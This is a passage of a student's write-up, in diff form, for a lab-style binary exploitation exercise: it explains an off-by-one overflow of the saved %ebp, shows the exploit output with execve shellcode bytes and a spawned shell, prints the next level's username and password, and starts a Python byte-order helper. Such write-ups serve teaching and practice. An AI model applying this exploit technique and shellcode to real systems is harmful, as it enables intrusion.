@@ -149,3 +149,77 @@ b = binascii.unhexlify(payload)
with open('/dev/fd/1', 'wb') as f:
    f.write(b)
```
## 3
This challenge is an off-by-one overflow problem. After reading figure 30 of aslr.pdf, I know that I should make the saved %ebp point to &buf[0] (0xbffffa40), put the new return address in &buf[1], and put the payload after it. So the one byte I can overflow should turn the low byte of the saved %ebp into 0x40. Now I'll do it.
However, after implementing the solution above, ./debug-exploit works but ./exploit doesn't. That's because the overflow byte 0x40, XORed with 1<<5, yields 0x60, a backtick, which breaks the shell (in the buggy exploit script). So I shift everything 4 bytes to the right: %ebp is now set to &buf[1], the new return address goes in &buf[2], and the overflow byte is 0x44. Now everything is OK.
```
pwnable:~$ ./exploit
#Eg#EgL���j1X̀�É�jFX̀1�Ph//shh/binT[PS��1Ұ
D���9���'�������]���'��� ���4���
/home/brown $ cat README
Remember, all I'm offering is the truth. Nothing more.
Next username: jz
Next password: cqkeuevfIO
```
My `./arg` script is attached below. Note that my `./egg` is empty.
```
#!/usr/bin/python3
def fuck8(txt):
    # Reverse the byte order of one 8-hex-digit (32-bit) word so that it
    # is little-endian when written to the stack.
    assert len(txt) == 8
    return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]

def revert(txt):
    # Apply fuck8 to every 32-bit word of a hex string.
    assert len(txt) % 8 == 0
    res = ""
    for i in range(len(txt) // 8):
        res += fuck8(txt[i*8:(i+1)*8])
    return res

# The original silly script broke the shell because the overflow byte "40"
# became "`" (0x40 ^ 0x20 == 0x60).